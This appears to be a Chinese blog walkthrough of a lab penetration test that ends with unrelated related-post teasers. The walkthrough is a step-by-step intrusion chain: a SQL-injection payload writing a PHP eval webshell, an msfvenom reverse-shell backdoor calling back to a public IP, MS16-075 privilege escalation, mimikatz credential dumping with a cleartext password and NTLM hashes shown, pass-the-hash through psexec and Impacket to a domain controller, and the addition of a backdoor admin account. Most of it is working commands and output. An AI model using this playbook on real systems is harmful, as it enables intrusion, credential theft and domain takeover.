msf如何内网信息收集,内网信息收集工具

内网渗透拿域控

环境:http://afsgr16-b1ferw.aqlab.cn/?id=1

【查看资料】

1、进去一看,典型的sql注入

 

2、测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题

①将shell.php写入网站根目录,payload

 union select 1,"<?php eval($_REQUEST[gylq]);?>"  into outfile 'C:/phpstudy/www/shell.php'

 

②蚁剑连接,发现权限很低

msf如何内网信息收集,内网信息收集工具

 

kali机的提权和后渗透方法

提权我们可以传个木马用msf试试,获取按照系统补丁来搜payload提权等等,这里就用最快的方式,msf(注意:,下面讲关于kali中msf怎么**,方法太多了)

kali**用花生壳

拿到webshell之后,由于这个webshell是在公网的,无法访问我们内网的kali,所以我们得将kali中的某个端口映射到公网

下载花生壳

1、可以看到kali的内网ip为192.168.0.108

 

2、接着设置一下花生壳的配置

 

3、可以看到我们映射到公网的ip和端口

 

4、接着使用msf制作访问我们公网ip和端口的后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=103.46.128.46 LPORT=26240 -f exe > payload.exe

msf如何内网信息收集,内网信息收集工具

 

4、打开msf的监听

handler -x -H 192.168.0.108 -P 6666 -p windows/meterpreter/reverse_tcp

或者使用

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.108

set lport 6666

run

 

5、执行webshell中的木马

msf如何内网信息收集,内网信息收集工具

 

sessions 1 //进入会话

6、发现无法不是最高权限,getsystem/getprivs并未成功

msf如何内网信息收集,内网信息收集工具

 

7、一般使用最多的是ms16_075的方式提权了,这个成功率高,试试

但是由于我们是内网,所以就必须准备两个msf窗口才能使用msf的提取功能

①msf窗口1执行监听命令

msf如何内网信息收集,内网信息收集工具

 

②msf窗口2权限低的那个会话执行提权命令

run exploit/windows/local/ms16_075_reflection_juicy lhost=103.46.128.46 lport=26240

msf如何内网信息收集,内网信息收集工具

 

③接着监听的那个msf窗口1就获得了一个system权限的会话

msf如何内网信息收集,内网信息收集工具

 

看路由器命令

route

msf如何内网信息收集,内网信息收集工具

 

一般为了防止后门被人关掉,将其注入到其他程序中

ps 查看进程pid

msf如何内网信息收集,内网信息收集工具

 

接着用migrate将我们后门注入到1816中,有效防止木马挂了

migrate 1816

msf如何内网信息收集,内网信息收集工具

 

通过shell命令进入命令窗口

msf如何内网信息收集,内网信息收集工具

 

内网信息收集

可以通过ifconfig看到内网ip

msf如何内网信息收集,内网信息收集工具

 

接着利用后渗透工具ping方法扫一下ip段,接着扫出三个ip存活

info post/multi/gather/ping_sweep //查看所需参数

run post/multi/gather/ping_sweep rhosts=10.0.1.4/24 //扫网段

msf如何内网信息收集,内网信息收集工具

 

还有一种方法,arp扫ip段,用法差不多,这个扫得快一些比较推荐

run post/windows/gather/arp_scanner rhosts=10.0.1.4/24

msf如何内网信息收集,内网信息收集工具

 

这是利用msf自带工具扫描,接下来再演示使用nmap扫一下看看

首先添加一个路由如下命令

run get_local_subnets //查看网段

run autoroute -s 10.0.1.0/24

run autoroute -p //查看已添加的路由

background //保存session返回msf

msf如何内网信息收集,内网信息收集工具

 

接着开启socks4a服务,使用msf的辅助模块

use auxiliary/server/socks_proxy

set VERSION 4a //设置为socks4a

run

msf如何内网信息收集,内网信息收集工具

 

接着设置/etc/proxychains.conf 中的内容改为下面展示截图,kali自带的代理工具

vim /etc/proxychains.conf

msf如何内网信息收集,内网信息收集工具

 

接着我们就可以利用proxychains4来进行连接3389端口,和进行内网ip段扫描,使用nmap扫描其内网ip及其端口等,但是扫的真的慢是我网太卡了么。

proxychains4 nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.0/24 --open

msf如何内网信息收集,内网信息收集工具

 

看到好多445端口,这里其实可以用永恒之蓝的

当然,也可以选择不用nmap扫描端口,我们可以用msf的模块扫描端口

use auxiliary/scanner/portscan/tcp 

set rhosts 10.0.1.6

msf如何内网信息收集,内网信息收集工具

 

kali机用kiwi抓取密码

也可以直接抓取管理员密码

msf提供一些后渗透的模块

load -l 来查看有哪些模块

msf如何内网信息收集,内网信息收集工具

 

其实kiwi就是mimikatz就是换了个名在这里,然后加载kiwi

msf如何内网信息收集,内网信息收集工具

 

查看当前kiwi的命令用help

help

msf如何内网信息收集,内网信息收集工具

 

对10.0.1.4机子进行抓密码,接着执行下面命令,就可以获取管理员密码,这个是对登陆过的账号和密码进行抓取

kiwi_cmd privilege::debug

kiwi_cmd sekurlsa::logonpasswords

msf如何内网信息收集,内网信息收集工具

 

获得密码

u:administrator

p:woshifengge1.

kali机hash传递得到会话

看到445端口就可以尝试hash传递,在不需要密码的情况下使用,发现10.0.1.6-10.0.1.8可以被利用

hashdump可获取hash值,得是64位系统权限才可执行

hashdump 

或者是 

run post/windows/gather/hashdump

或者是

run  post/windows/gather/smart_hashdump

以上都可以获取hash值



background 返回

msf如何内网信息收集,内网信息收集工具

 

Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

test:1009:aad3b435b51404eeaad3b435b51404ee:77be122bef1c2d43f67721c95114f46b:::

通过网段知道6-8有445可以利用smb的hash传递连接10.0.1.8这台机子,因为一般情况几台机子的密码都相同。

use exploit/windows/smb/psexec

set payload windows/meterpreter/bind_tcp 

//正向连接

set SMBUser Administrator

set SMBPass aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83  #hashdump获取的hash值进行

msf如何内网信息收集,内网信息收集工具

 

msf如何内网信息收集,内网信息收集工具

 

这里发现10.0.1.8这台机子存在域控,dns一般是和域控绑定在一个服务器上的

shell

ipconfig /all

msf如何内网信息收集,内网信息收集工具

 

shell查看域的命令

shell中命令使用查看是否存在域的方法

这里明显A1这台机子处于域中

1、查看域中计算机

net view //查看域中的计算机

msf如何内网信息收集,内网信息收集工具

 

net view /domain //查看域

msf如何内网信息收集,内网信息收集工具

 

根据ipconfig /all 可以知道域控主机的ip是10.0.1.6

hash传递并不能登陆进去

2、查看域中的计算机

就一台A1,这里我们得通过A1去获得域控

net view /domain:ZKAQ

msf如何内网信息收集,内网信息收集工具

 

3、ping计算机名可以得到IP

ping A1

msf如何内网信息收集,内网信息收集工具

 

ping zkaq.cn

msf如何内网信息收集,内网信息收集工具

 

4、获得所有域的用户列表,有一个krbtgt就是域用户

net user /domain

msf如何内网信息收集,内网信息收集工具

 

5、获取域用户组信息

net group /domain

msf如何内网信息收集,内网信息收集工具

 

6、获取当前域管理员信息

net group "domain admins" /domain

msf如何内网信息收集,内网信息收集工具

 

7、查看域时间及域服务器的名字

net time /domain

msf如何内网信息收集,内网信息收集工具

 

通过域的信息收集得到DC.zkaq.cn 10.0.1.6这个就是域控

拓展,导入kiwi的命令使用

msf如何内网信息收集,内网信息收集工具

 

1、msv列出NTLM

kiwi_cmd sekurlsa::msv

msf如何内网信息收集,内网信息收集工具

 

2、kerberos抓密码,发现全部加密了

kiwi_cmd sekurlsa::kerberos

msf如何内网信息收集,内网信息收集工具

 

3、也可以用creds_all抓取密码,但也明显加密

creds_all

msf如何内网信息收集,内网信息收集工具

 

Username       Domain  NTLM

--------       ------  ----

A1$            ZKAQ    3bf63ae494aee3a74fa90a41b9459df9

Administrator  ZKAQ    61465a991b168727b65b3644aab823cd 

Administrator  A1      4d1de63584701c85b8b9eccf5243ef83

Impacket实现域控NTML的hash传递

这里发现密码是无法获取的,因为NTLM是密文,我们可以使用hash传递,不过这里得使用Impacket的包

首先我们要先去GitHub下载源码,或者直接使用

git clone 

然后解压缩,进入impacket

cd impacket/

然后运行

python setup.py install

工具都在这个目录里impacket/examples

cd impacket/examples

msf如何内网信息收集,内网信息收集工具

 

接着我们使用smbexec.py这个模块,用上面的ntml值hash传递登陆域控机子

proxychains4 python3 smbexec.py -hashes :61465a991b168727b65b3644aab823cd ZKAQ/Administrator@10.0.1.6

成功拿下域控的超级管理员权限

msf如何内网信息收集,内网信息收集工具

 

接下来是基础操作添加超管账号,然后登陆域控

net user gylq ********** /add #密码打长的,2008有限制,密码不能太简单

net localgroup administrators gylq /add #添加超管

msf如何内网信息收集,内网信息收集工具

 

直接代理登陆域控10.0.1.6就报错,这是域控机的守护机制

msf如何内网信息收集,内网信息收集工具

 

需要使用他域内的机子去登陆,我们先登陆10.0.1.8,再登陆域控

远程3389登陆域控

也可以用直接用抓取的密码来代理登陆3389的端口等,只是演示一下

如果对方没有开启远程连接,可以使用msf自带命令启动

run getgui -e

先登陆10.0.1.4,才发现这个不是域内机子,得去登陆10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.4

msf如何内网信息收集,内网信息收集工具

 

也可以用代理直接连接10.0.1.8,来进行确定

proxychains4 rdesktop -u administrator -p woshifengge1. 10.0.1.8

msf如何内网信息收集,内网信息收集工具

 

接着用10.0.1.8作为跳板登陆10.0.1.6,即域控机子

msf如何内网信息收集,内网信息收集工具

 

成功登陆域控

msf如何内网信息收集,内网信息收集工具

 

总结:这是kali中使用msf和impacket联合拿域控

本文来自投稿,不代表展天博客立场,如若转载,请注明出处:https://www.me900.com/326457.html

(0)

相关推荐

  • 网吧操作系统,网吧操作系统选纯净版可以吗

    《网吧操作系统:从入门到精通》 一、网吧操作系统的概述我觉得网吧操作系统可能和普通的计算机操作系统有些相似,但也许又有一些独特的地方。它就像是网吧这个特殊环境下的“大管家”,需要负责管理众多电脑的运行、网络连接等各种事务。 普通的计算机操作系统我们可能比较熟悉,比如Windows系统等,它们为单个用户提供各种服务和功能。而网吧操作系统则要面对几十甚至上百台电…

    投稿 2025-09-08
  • ChatGPT中文版网页,chat page

    《ChatGPT中文版网页:探索与思考》 在当今数字化的时代,搜索引擎优化(SEO)变得越来越重要。 而对于那些关注人工智能领域的人来说,ChatGPT中文版网页无疑是一个备受关注的话题。 那么,ChatGPT中文版网页到底是什么?它有哪些特点和优势?又该如何进行SEO优化呢?让我们一起来探索和思考。 一、ChatGPT中文版网页的简介 ChatGPT是由O…

    投稿 2025-05-30
  • 青岛有啥赚钱的路子,青岛做什么餐饮赚钱

    如果说有什么食物是全年龄层都适合的,那肯定是饺子,不管是南方还是北方,各个年龄层的消费者对于饺子的喜爱程度都非常高,而且这也适合一家人一起吃,因此其实开饺子馆是一门相当赚钱的生意。 一、背景介绍 青岛的钱大姐开了一家饺子馆,她也是觉得饺子馆容易赚钱,现在做实体店生意不容易,不是竞争对手太多,就是客户群体太少,而饺子馆这两方面的劣势是最小的,大家能够看到满大街…

    2022-04-27 投稿
  • 负债百万如何走出困境?欠债之后的正确做法

    万物都有其运作规律。金钱其实就要像一个人一样。你和它处好了关系,它就愿意一直留在你身边。当你和它的关系降到零度以下的时候,你就自然而然欠债了。 所有负债的人都是和金钱处不好关系的人。问他对金钱的感觉是什么?他更多的是恐惧和愤怒。而不是喜悦,开心。 恐惧和愤怒就是的负债的原罪。它们会让你陷在债务的沼泽里爬不出来。 你会发现怎么努力,早起晚归,把身体努力到垮掉都…

    2022-06-07 投稿
  • 2021世界杯欧洲区赛程表(欧洲杯2021赛程时间表)

    直播吧12月8日讯 今天凌晨,2022年卡塔尔世界杯欧洲杯预选赛抽签在苏黎世进行。55支球队将分成10个小组,争夺13个出线名额,其中10个小组第一直接出线,剩余3个名额将由附加赛决出(下文有介绍)。 2022世界杯欧预赛抽签结果: A组:葡萄牙、塞尔维亚、爱尔兰、卢森堡、阿塞拜疆 B组:西班牙、瑞典、希腊、格鲁吉亚、科索沃 C组:意大利、瑞士、北爱尔兰、保…

    2022-01-01
  • 现在什么平台引流效果比较好

    流量越来越贵,已经成为共识,无须赘述。 但是在过去的2021年,线上流量突然呈现出2个罕见特点,不知各位有无发现?1、2021年以前,我们做公域流量直接转化,在运营得当的情况下,ROI能做到3,甚至更高。但是2021年,在公域流量里直接转化,能做到1就很不错了。什么意思呢?就是说2021年以前,你写篇文章或拍个视频,在文章或视频里直接放购物车,内容爆了,ro…

    2022-06-03
  • 杰克琼斯羽绒服,杰克琼斯羽绒服:保暖柔软舒适的服装

    本内容来源于@什么值得买APP,观点仅代表作者本人 |作者:尧尧妈妈 hi~大家好,我是尧尧妈妈! 今年夏天,楼主曾经发过一篇给老公买了件700 的法国鳄鱼polo衫,结果他生气了!其实都是真实生活写照,发表后很多值友纷纷吐槽不值得,还说楼主败家娘们,让我欲哭无泪。但是其中的不少评论也让我深有感触,很多值友们都纷纷评论说婚后全身上下的穿搭不超过百元,所以婚姻…

    投稿 2023-05-23
  • 2023紫微星降世(莫小棋预言2023年巨星)

    你有故事,欢迎来找我 关注并私信我,一起解决感情纷扰 以前的他,为了爱情,荒废了自己的事业,如今的他,要好好捡回自己的专业,好好经营自己的事业。 如今的贾乃亮不再会被人说可怜,更多的人会被他精湛的演技与扎实的基本功折服,大呼他就是一个“宝藏男孩”。 谁也不会再把他与那段卑微的感情放在一起,更不会再给他贴上“妻奴”的标签。 再看马伊琍,产后重返职场后就把罗子君…

    投稿 2023-03-29
  • 六朝古都有哪几个城市(我国著名的六朝古都是哪个城市)

    今日南京 南京也是中国著名的大古都,素有六朝古都之称。我们先来介绍一下这六朝在南京建都的情况。   首先,第一个在南京建都的王朝是三国时期的孙吴政权。早在孙权割据江东的时候,刘备曾经派诸葛亮过江,来到建业一带一看,就被这个地方的山川形势所吸引,他对孙权称赞道:这个地方真的是虎踞龙蟠啊!后来孙权就把建业作为自己的根据地。而等到孙权称帝之后,就正式以建…

    2021-12-28 投稿
  • 查淘宝排名,淘宝关键词搜索排名怎么查看?

    对于淘宝平台来说,商品的关键词是非常重要的,因为很多买家在淘宝购物时候都会在搜索栏搜索关键词,因此商家如果选择了对的关键词就可以直接影响到商品的搜索率了。那么淘宝关键词搜索排名怎么查看?如何优化? 淘宝关键词搜索排名怎么查看? 大家想要查看淘宝关键词的排名很简单,就可以通过阿里指数看到指定类目的关键词排名和指定区域的关键词排名。 如何优化? 1、找属性关键词…

    2023-02-03
  • 好物推荐起名字,好物推荐以及直播带货

    现在好多人依然很迷茫,实体经济依然是形势很严峻,2021年可以说,对很多人来说,都是非常难的一年,好在快要结束了 2022年是新的一年,我们要尽快确定好自己要做的方向,不然等过年了,又该慌张,现在很多项目还是可以做的,比如好物推荐以及直播带货,很多人没进入这个行业,所以觉得很难!任何一个行业,一旦你进来了,就容易了,迈进的第一步往往都是最难的! 好物推荐是基…

    2023-02-12
  • 衣服上的油渍怎么洗掉,衣服上的油渍怎么洗掉小窍门

    在所有可能的洗衣问题中,油脂和油渍是最令人讨厌的。这些斑点不仅看起来像你衣服上的拇指酸痛一样突出;众所周知,它们也很难去除。 根据宝洁公司的高级科学家劳拉古德曼的说法,这些污渍的弹性要归功于基本的化学反应。大多数油脂和油在室温下是半固体或固体,这意味着去除需要温水或热水。它还取决于织物:古德曼说聚酯等合成纤维特别难以处理,因为油脂和油会被它们吸引。由于合成纤…

    2022-04-20 投稿